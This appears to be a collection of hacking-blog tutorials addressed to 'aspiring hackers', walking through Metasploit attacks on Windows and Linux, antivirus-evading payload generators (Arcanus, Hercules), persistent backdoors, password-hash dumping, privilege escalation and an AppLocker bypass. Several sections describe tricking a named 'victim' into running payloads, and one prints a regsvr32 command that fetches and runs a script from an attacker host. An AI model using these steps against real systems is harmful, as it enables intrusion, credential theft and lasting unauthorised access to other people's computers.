System hacking

Hello aspiring hackers. There’s been a loooong (forgive the grammatical error) gap  in updating the blog. Well, blame it on 70% hectic schedule and 30% procrastination. But today we will see how to hack windows with HTA web server.

First things first. What is HTA web server? HTA stands for HTML application. So this server hosts a HTA file, which when opened will execute a payload via powershell. Ofcourse, the browser warns the user before executing the payload.

Now let’s see how this works. We will use this exploit to hack Windows 10. Start Metasploit and load the module as shown below.

Set the reverse meterpreter payload as it is a local exploit.

Type command “show options” to see the options we need to set for this exploit. Set the required options and type command “run” to start the exploit.

As you can see, it has generated an url. We need to make the victim click on this particular url for our exploit to work. We have already seen in our previous howto’s, how to make that happen. When the victim clicks on the url we sent him as shown below

the browser prompts a warning about the payload as shown below.

When the user ignores the user and clicks on “run”,  a meterpreter session is opened as shown below.

This session can be viewed and opened as shown below.

Hello aspiring hackers. Till now we have seen various ways of hacking windows, escalating privileges and creating a persistent backdoor for later access. After we have successfully created a backdoor, it’s time to perform further reconnaissance. Windows post exploitation recon helps us in gathering further info about our target network. This can be helpful to us in finding more vulnerable systems to hack and pivot.

If you have observed carefully while starting Metasploit, it has number of modules specified as “post”. Some of these are useful in recon. For us to do post recon we need to first hack the system and get metertpreter session on it. Now let us see how to perform this recon with Metasploit.

The first module useful in reconnaissance in the arp scanner. Arp scanner helps us to identify any hidden devices in the network. Hidden devices are those devices which don’t respond to normal requests like ping etc. For example, some firewalls intentionally don’t respond to ping requests. ARP scanning can detect these devices.

winpostexrc1

The checkvm module helps us to find out if the machine we hacked is a virtual machine, which in this case is true.

winpostexrc2

The dumplinks module will parse .lnk files from a user’s Recent Documents folder and Microsoft Office’s Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

winpostexrc4

In some cases, we need to know what are the applications installed in the system we hacked. For example, in a case where we cannot escalate privileges and maybe a vulnerable program installed in the target can help us in privilege escalation. The enum_applications module exactly does that.

We can see in this specific case, there are only two programs installed.

winpostexrc5

The enum_logged_on_users module helps us in finding out the users logged in.  This may help us in knowing the usernames of the system.

In our case, we go to know the username as “admin”.

winpostexrc6

The enum_shares module will list the shares of both configured and recently used shares on the compromised system. My target doesn’t have any shares.

winpostexrc7

The enum_snmp module will enumerate the SNMP service on the target, if installed. It will also enumerate its community strings.

In our case, there’s no SNMP service installed.

winpostexrc8

The hashdump module does exactly what it says. It dumps the password hashes from the target system as shown below. May I remind you that meterpreter already has this hashdump function.

winpostexrc9

The usb_history module retrieves the history of usb devices connected to the target system. In my case, no USB devices were connected to the target.

winpostexrc10

The most interesting of all these is the lester script. The lester script suggests local exploits for the target system. This script automatically searches and lists exploits for the targeted system. Now you may question why do we need exploits for the system we already hacked. Well maybe to escalate privileges or find an exploit which gives us more power on the system.

winpostexrc11

That’s all for today folks. I will be back soon.

Hello aspiring hackers, till now we have only seen hacking windows operating systems with customized payload generators. Today we will see hacking Linux OS with Arcanus framework.

Although not as great as Windows, people using Linux OS are growing day by day. In my opinion, Linux os is a bit easy to hack with payload generators as there is a general myth that Linux is immune to malware. Some of my friends use Linux as dual boot to keep themselves safe from virus. Here are some more myths people have about Linux security.

Ok, now let us see how to hack Linux OS with Arcanus Framework. Start Arcanus Framework and select the option 3 since we are generating a Linux payload. If you are new to Arcanus Framework, go here.

arcalin1

Hit Enter. Enter your IP address (Kali Linux in this case) and the listening port as shown below.

arcalin2

Hit Enter. It will generate the payload in the same directory start to automatically listen for a reverse shell as shown below.

arcalin3

Send the generated payload to our victim. When he runs it, we should get a shell on his system as shown below.

arcalin4

 

Good afternoon friends. Recently we have seen about windows hacking with Arcanus framework. Today we will learn about another payload generator that helps us in bypassing antivirus ( till date) during pentest of Windows machines. That is Hercules framework.

Let’s start by cloning Hercules framework from github as shown below.

2hercules1

After cloning, a new directory with name HERCULES will be created. Move into that directory and do a “ls”. We should see a file named “Setup”. First change the permissions of this file using chmod as shown below. Once we get execute permissions on the Setup file, execute the file using command “./Setup“.

2hercules2

The setup automatically installs Hercules as shown below and

2hercules3

successfully ends as shown below. You have successfully installed Hercules framework in Kali Linux.

2hercules4

Type command “HERCULES” to start the framework. It’s interface looks like below. In this part, let’s generate a payload. Enter option “1”.

2hercules6

Select what type of payload you want to create. There are four payloads as shown below. I am choosing the first one. You can choose appropriately.

2hercules7

After we select the type of payload we want to create, we need to enter some options. Let us see the options it provides. LHOST and LPORT are self explanatory.  Choosing Persistence function adds our running binary to Windows startup registry so that we can have persistent access to the target.  Since we have already know how to create a persistent backdoor we will not enable it here.

Migration function triggers a loop that tries to migrate to a remote process. UPX ( Ultimate Packer for executables ) is an open source executable packer. To those newbies who have no idea what packers are, they are used to compress the executables. Software vendors also use them to obfuscate the code. We will see more about packers in our future howtos.

Concerning this howto, remember that enabling migration, persistence and UPX functions may increase the chances of your payload being detected by Antivirus.

2hercules8

Here I have only enabled the UPX function so the packing process begins as shown below.

2hercules9

Once the packing process is over, your final binary file is stored with the name you have given to it. I named it as “res”.

2hercules10

Next start the listener on Metasploit as shown below and send the  binary file to our target. Once he clicks on our executable file, we will get the meterpreter session as shown below.

2hercules11

In our part2 of this howto, we will see how to bind our payload to other executables.

Good morning aspiring hackers. Today we will see how to create a persistent windows backdoor with Metasploit. As soon as we get meterpreter shell on the target system, it is a good practice for a hacker ( pen tester ) to create a backdoor. Coming to that, what exactly is a backdoor? A backdoor is something which gives us continuous access to our target system.

Next question that comes to our mind is why we need to create a backdoor? Most of the methods we used to take control of our target systems are based on the vulnerabilities our target has. So once the vulnerabilities are patched, access to the target is lost. That’ why we need to create a backdoor.

This backdoor also answers a question many people ask like, once we get a meterpreter shell, can we shut down our machine? If we restart, will the connection be gone or still intact? .This backdoor needs only one one condition to be fulfilled. The target system should be out of its safest mode. i.e it shouldn’t  be turned off .
Now let us see how to create a persistent windows backdoor with Metasploit. In the meterpreter session we acquired on the target system, run the command “run persistence -h“. It will show you all the options we can set for our backdoor. All the options are self explanatory.

persistence1

Now I want my backdoor to start as soon as the system starts. So I chose ‘X’ option. After starting, I want it to make connection attempt to my attacker system every three seconds, so I kept the interval(i) as 3. The port on which connection should be made is 443. The option (r) is remote system’s IP address i.e the IP of the system to which the connection should be made.

Remember this script will be installed on the target system. Run the script. As you can see, the file is installed in the autorun.

persistence2

Now it’s time to start a listener on our attacker system. We have done it many times as shown below.

persistence3

Change the options accordingly as we set in the persistence script and start the handler. If the system is live, we will get the meterpreter shell as shown below.

persistence4

 

 

 

WARNING: This post is for education purpose only. Misuse this post at your own  risk.

Hello aspiring hackers. Today we will learn how to do Windows hacking with Arcanus Framework. Arcanus is a customized payload generator that can generate payloads which are undetectable by almost all of the antiviruses (till date ). This could be very useful in penetration testing.

Today we will see how to get a shell on a remote Windows system with this tool. Before we do anything, we need to install golang. Install Golang and then clone the Arcanus git as shown below.

arcanus1

Navigate to the ARCANUS directory created and view its contents. We should see a file ARCANUS_x86. We will generate a x_86 payload. First change its permissions as shown below.

arcanus2

Next run this file. You should see an ARCANUS logo as shown below.

arcanus3

You will see five options as shown below. Since we are about to hack windows, we will generate a windows payload by choosing option 2.

arcanus4

It will prompt you for the attacker IP address ( in our case the address of Kali Linux ) and a port on which you to listen for the reverse shell. Enter the values and hit “Enter”.

arcanus5

It will generate the payload and automatically start a listener as shown below.

arcanus6

The payload will be generated with the name “payload.exe” as shown below in the ARCANUS directory.

arcanus7

Next we need to send this payload to the victim. When the victim clicks on the payload we sent, we will get a shell of the victim as shown below. Happy hacking.

arcanus8

Good evening friends. Recently we have seen how to exploit server credential disclosure vulnerability in Webnms framework 5.2. This time around researchers found an arbitrary file upload vulnerability in the Webnms framework 5.2.

The Fileuploadservlet has a directory traversal vulnerability in the “filename” parameter which allows an unauthenticated user to upload a jsp file. We can only upload text files and to achieve RCE , they need to be dropped in ../jsp/ folder with names only as login.jsp or webstartXXX.jsp ( where XXX is string of any length).

Here is the code vulnerable to arbitrary file upload.

webnmsfileupload0Here are the names of the files that are uploaded in the process of exploitation. As you can see, the files are appended with random text.
webnmsfileupload00
Ok. Now let’s see how this exploit works. Start Metasploit and load the exploit as shown below.
webnmsfileupload1
We need to only set the target IP. The “check” command may not give you exact status of vulnerability as shown below.
webnmsfileupload2
 Set the meterpreter payload as shown below.
 webnmsfileupload3
Type “run” command to execute the exploit. You should successfully get meterpreter session as shown below.
webnmsfileupload4
 

 

Good evening friends. Recently we have seen privilege escalation in Windows 7 with bypass uac exploit. Today we will see another exploit ms16-016 mrxdav.sys WEBDAV for privilege escalation in Windows 32bit machines. mrxdav.sys is a Windows driver. It is also called as Windows NT WebDav Minirdr and is used on Windows computers to utilize WebDAV servers. This exploit uses the Microsoft Web Distributed Authoring and Versioning (WebDAV) client to send specifically crafted input to a server to escalate privileges.

First hack the system with Metasploit by using one of the methods shown  in Latest hacks. Once you got a meterpreter session, check the privileges by typing command “getuid“.  We don’t have system privileges. Background the session by typing command “background” as shown below.

webdav1

Load the ms16_016_webdav exploit as shown below.

webdav2

We need only one option: session id of the session we just backgrounded. Set the session id as shown below. Run the exploit. The exploit ran successfully.

webdav3

Now verify the privileges by typing “getuid” command once again as shown below.  We successfully got system privileges.

webdav4

 

Hello friends. A while ago, we saw Poison Ivy buffer overflow exploit. This exploit is just like the Poison Ivy exploit but this time we target Darkcomet RAT. ( We will learn more about Darkcomet and RAT’s later ). In this case we can just download a file from the system running Darkcomet server.

Start Metasploit and load the exploit as shown below. Type command “show options” to see the options we need.  Look at the options. Although you are familiar with the usual options, there are some new options like NEWVERSION, STORE_LOOT and TARGETFILE.

-NEWVERSION : This exploit works on all darkcomet versions from 3.2 to above. If the version we are targeting is                                       above 5.1, we need to set this option to “true”.

-STORE_LOOT : If you set this option to true, the file we download will be stored in loot. If the option is false, the                                       contents of the file will be outputted to console.

-TARGETFILE : the file to be downloaded from the remote system.

dcometfd1

Set the options as required. I have set store_loot option to false. If you don’t set any targetfile, by default it will download the config file of Darkcomet.

dcometfd2

Let’s see by running the exploit. We can see the contents of Darkcomet configuration file as shown below.

dcometfd3 dcometfd4

Now let’s try to download another file. For this, we need the RC4 key of Darkcomet and the password you got in the config file is useless. But there is high probability that a password has not been set. Then we can just set the DC prefix as key and run the exploit as shown below.

Here I am trying to download the hosts file but encounter an error. It’s probably Windows UAC protecting us.

dcometfd5

Now let’s create a text file in the admin folder called hello.txt with content as “hello hacker”. Now set this as target file and run the exploit. We can see that the text of the file is successfully displayed as shown below.

dcometfd6

It is becoming difficult ( although not impossible ) day by day to hack Windows with no vulnerabilities like ms08_067  and of course a lot of security features enabled in Windows. But where there is a will, there is always a way.  Regsvr32 applocker bypass exploit is one such exploit. To understand how this exploit works, you need to know some things like dll and applocker.

AppLocker introduced in Windows 7 and Windows Server 2008 R2 provides administrators to set rules to allow or deny applications from running. These rules could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

Ok, now what is a dll? A dll is a dynamic link library. A dynamic link library contains code and data which can be used by multiple programs at the same time. These libraries usually have  file extensions DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers).

Ok now let us see how this exploit works? Start Metasploit and load the exploit as shown below. Check the options we need to set? We can see that the reverse_tcp  meterpreter payload is already set. We will be using  this payload only.

regsvr31

Set all the required options as shown below. SRVhost and lhost are the IP address of our attacker system. After all options are set, type command “run” to run this exploit. It finishes by giving us a command as shown below. We need to run this command on our target system.

regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll

Now let us understand this command discovered by researcher Casey Smith. Regsvr32 is a command line utility to register .dll files as command components in the registry. The ‘s’ option specifies regsvr32 to run silently without displaying any message boxes. The ‘n’ option specifies regsvr32 to not call DllRegisterServer. Since we have specified regsvr32 not to call DLLregisterserver, we should specify another address. We can do this by using “i” option and the IP address where we want ( attacker IP ).

You can see above that our exploit has created a link above for an sct file and a dll.

regsvr32

Now it’s time for our victim to type our command on his system. Copy the command on Notepad and save it as a batch file. Convert this file to exe and send this file to the victim. I have shown one method here.

regsvr33

Now we have to start a listener as shown below.

regsvr34

Set the options exactly as we set for the exploit. So, set the port to 1111. After all the options are set, type “run” to run this exploit. If you get an error like shown below, just change the port and type “run” again. That is just a minor glitch in Metasploit.

After typing “run” the exploit will hang on as shown below.

regsvr35

When our user clicks on our file we sent him, a meterpreter session is opened as shown below.

regsvr36

This may not directly take you to a meterpreter shell and hang on as shown above. Hit on CTRL+C to interrupt the session as shown below.

regsvr37

Next type “sessions -l” to see the available meterpreter sessions. when you get the available sessions type command “sessions -i 2” where “2” is its session id as shown below. Next, well you know what it is.

regsvr38